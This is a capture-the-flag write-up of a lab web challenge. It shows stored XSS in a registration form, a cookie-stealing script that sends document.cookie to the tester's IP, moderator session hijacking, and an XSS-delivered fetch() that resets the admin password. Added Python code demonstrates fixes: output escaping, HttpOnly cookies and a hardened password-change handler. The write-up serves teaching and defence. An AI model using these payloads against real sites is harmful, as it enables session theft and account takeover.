Target IP: 10.10.13.206
Challenge Description:
This challenge requires me to add the hostname worldwap.thm inside my /etc/hosts file first. After doing this, I ran a TCP port scan using the command sudo nmap -sS worldwap.thm -p- and identified that three ports are open on the target machine: SSH, HTTP, and another HTTP application on port 8081, as shown above.
After identifying three applications on the target machine, I performed an aggressive port scan against the three ports using the command sudo nmap -sV -A worldwap.thm -p 22,80,8081, as shown above. After this port scan, I obtained the result shown above. Since the challenge is to attack the web application via XSS/CSRF, time to enumerate the web applications.
Port 80: HTTP
Browsing to http://worldwap.thm returns the webpage shown above. I notice there is a Register button on the top of the web application.
The registration webpage above is returned to me after pressing the Register button from the previous image. Right away, I notice the information message You can now pre-register! Your details will be reviewed by the site moderator. Maybe I can perform an XSS attack here, as the input details are checked by the moderator team. Maybe I can try to obtain the cookie of the moderator?
To test if the web application is vulnerable to XSS/CSRF attacks, I started a Python HTTP server on my machine using the command python3 -m http.server 80. Then I injected the payload <script>fetch("http://10.14.55.153/");</script> inside the different parameters.
After some manual testing, I noticed the parameter Name is vulnerable as I received the HTTP request made by the target machine to my machine on port 80. Now I can use the modified payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> to obtain the cookie of the moderator of the website :)
And bingo! I registered using the details shown above. I inserted the cookie stealing payload <script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script> inside the Name parameter and obtained the cookie of the user moderator as shown above.
After decoding this value using the Decoder tool offered by Burp Suite, I obtained the result PHPSESSID=vegc1vmobcp87r0vdjuumhapvo as shown above. Now I can use the cookie vegc1vmobcp87r0vdjuumhapvo to gain access to the web application as the moderator.
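The cookie theft above works for two reasons: the Name field is rendered on the moderator's review page without HTML escaping, and the PHPSESSID cookie is readable from script. The Python below is an added example, not code from the challenge, showing the two server-side fixes: escaping untrusted data before it reaches the moderator's page, and issuing the session cookie with HttpOnly (plus Secure and SameSite), after which document.cookie no longer includes it. The review-table markup, the helper names, the placeholder session id and the extra "theme" cookie are assumptions constructed for the demonstration.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample: the Name value from the writeup's registration, i.e. the
# payload that would be stored and later displayed to the moderator.
SUBMITTED_NAME = '<script>fetch("http://10.14.55.153/" + btoa(document.cookie));</script>'


def render_pending_registration(name: str) -> str:
    """Render one row of the (assumed) moderator review table with Name HTML-escaped.

    html.escape turns <, >, &, " and ' into entities, so the stored payload is
    displayed as text instead of being parsed as a <script> element.
    """
    return f"<tr><td>{html.escape(name, quote=True)}</td></tr>"


def contains_active_markup(rendered: str) -> bool:
    """Crude check used only for the demonstration: does the rendered HTML still
    contain a raw <script> tag or an inline event handler from user data?"""
    return re.search(r"<\s*script|\son\w+\s*=", rendered, re.IGNORECASE) is not None


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie header value for PHPSESSID with the flags that keep it
    out of document.cookie (HttpOnly) and off plain-HTTP and cross-site requests."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["secure"] = True
    jar["PHPSESSID"]["samesite"] = "Lax"
    jar["PHPSESSID"]["path"] = "/"
    return jar.output(header="").strip()


def script_visible_cookies(set_cookie_headers) -> str:
    """Emulate what document.cookie exposes to an injected script: every cookie
    except those flagged HttpOnly. With the header above, PHPSESSID is absent."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        flags = {p.lower() for p in parts[1:]}
        if "httponly" not in flags:
            visible.append(parts[0])
    return "; ".join(visible)


if __name__ == "__main__":
    unsafe = f"<tr><td>{SUBMITTED_NAME}</td></tr>"      # what a vulnerable page emits
    safe = render_pending_registration(SUBMITTED_NAME)   # what the fixed page emits
    print("unsafe row contains live script:", contains_active_markup(unsafe))
    print("escaped row contains live script:", contains_active_markup(safe))
    header = session_cookie_header("EXAMPLE-SESSION-ID")  # placeholder, not a real session id
    print("Set-Cookie:", header)
    print("document.cookie would be:", repr(script_visible_cookies([header, "theme=dark; Path=/"])))
```

With both changes in place the injected fetch() would at most send btoa("") of whatever non-HttpOnly cookies exist, and the moderator's page would show the payload as literal text.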
I modified the PHPSESSID parameter to vegc1vmobcp87r0vdjuumhapvo directly on the web browser, as shown above.
After modifying the cookie value to the moderator's cookie value, I refreshed the webpage and obtained the result shown above. Now I have access to the web application as the moderator :) However, I did not find anything useful here. Still, from previous enumeration, when I tried to register as a user, I identified the hostname login.worldwap.thm. Since I have moderator access on the web application, maybe I can access this web application as this same user too?
And bingo! Now I have access to the other web application as the moderator. I notice it is possible to change the password. Maybe I can force a change of the password of the user admin? There is also a chat application.
The chat application webpage is shown above. It can be used to talk to the admin? Maybe I can perform an XSS attack here too?
I used the payload <script>alert(1);</script> first.
And yep. The chat application is vulnerable to XSS as the alert function was executed successfully. Time to test the Change Password functionality too.
I ran Burp Suite and changed the password of the user moderator to password, as shown above. When I intercepted the HTTP request, I noticed there is one parameter called new_password where the password is sent in plaintext. I can force the admin user to change their password.
To accomplish this, I used the Change Password functionality again, as shown above, on the web browser. Then I copied the resulting POST request using Copy as Fetch, as shown above. Then I will need to modify the request parameters to force the password reset. The new script is shown above. I will need to deploy the following script inside the chat application to force a reset of the password of the user admin to password:
<script>fetch("/change_password.php", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "/change_password.php",
    "body": "new_password=password",
    "method": "POST",
    "mode": "cors"
});</script>
And after logging out of the web application as the moderator, I used the credentials admin:password to log in and gained access to the web application as the admin. GG :)
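The forced password change succeeds because /change_password.php accepts new_password alone from any request that carries the victim's session cookie. The Python below is an added example, not the challenge's PHP, of how a handler for that endpoint can be hardened with three checks: a matching Origin, a per-session CSRF token compared in constant time, and re-authentication with the current password. The first two stop cross-site CSRF, but script injected into the same origin (the chat XSS) passes the Origin check and could read the token from the form page; the current-password requirement is the control that actually defeats the payload above, because the stolen session cookie never reveals it. The Request and Session classes, the csrf_token and current_password field names, the origin https://login.worldwap.thm, the minimum length and the in-memory user store are assumptions constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Assumed origin of the admin portal; the challenge's real scheme/host may differ.
SITE_ORIGIN = "https://login.worldwap.thm"

# Constructed in-memory user store. Plaintext is used only to keep the example
# short; a real application stores and compares a password hash (bcrypt/argon2).
USERS = {"admin": "S3cret-original-pw"}


@dataclass
class Session:
    """Stand-in for the PHP session: the logged-in user and their CSRF token."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Stand-in for the incoming HTTP request to change_password.php."""
    method: str
    origin: Optional[str]
    form: dict


def _same(a: str, b: str) -> bool:
    """Constant-time string comparison (bytes, so non-ASCII input cannot raise)."""
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))


def change_password(req: Request, session: Session) -> tuple:
    """Hardened handler for the endpoint the writeup's injected fetch() targets.

    Returns (status_code, message). A request carrying only new_password, like
    the payload in the writeup, is refused before any password is written.
    """
    if req.method != "POST":
        return 405, "method not allowed"

    # 1. Origin check: stops classic cross-site CSRF. Script running inside the
    #    same origin passes this, so it is defence in depth only.
    if req.origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"

    # 2. Per-session CSRF token. Raises the bar; a same-origin script could still
    #    obtain it from the form page, which is why step 3 exists.
    if not _same(req.form.get("csrf_token", ""), session.csrf_token):
        return 403, "missing or invalid CSRF token"

    # 3. Re-authentication: the current password must be supplied. It is not in
    #    the session cookie, so neither a stolen cookie nor injected script has it.
    if not _same(req.form.get("current_password", ""), USERS.get(session.user, "")):
        return 403, "current password incorrect"

    new_password = req.form.get("new_password", "")
    if len(new_password) < 12:
        return 400, "new password too short"

    USERS[session.user] = new_password
    session.csrf_token = secrets.token_urlsafe(32)  # rotate after a sensitive action
    return 200, "password changed"


if __name__ == "__main__":
    admin_session = Session(user="admin")
    # The writeup's payload: new_password=password with the victim's cookie and nothing else.
    injected = Request(method="POST", origin=SITE_ORIGIN, form={"new_password": "password"})
    print("injected request:", change_password(injected, admin_session))
    # A legitimate submission from the form, carrying the token and current password.
    legitimate = Request(method="POST", origin=SITE_ORIGIN, form={
        "csrf_token": admin_session.csrf_token,
        "current_password": "S3cret-original-pw",
        "new_password": "correct-horse-battery-staple",
    })
    print("legitimate request:", change_password(legitimate, admin_session))
```

Even with the chat XSS still present, an injected script cannot pass step 3 without the admin's current password, so the chain from stored XSS to account takeover is broken at the password-change endpoint rather than relying on the XSS being fixed first.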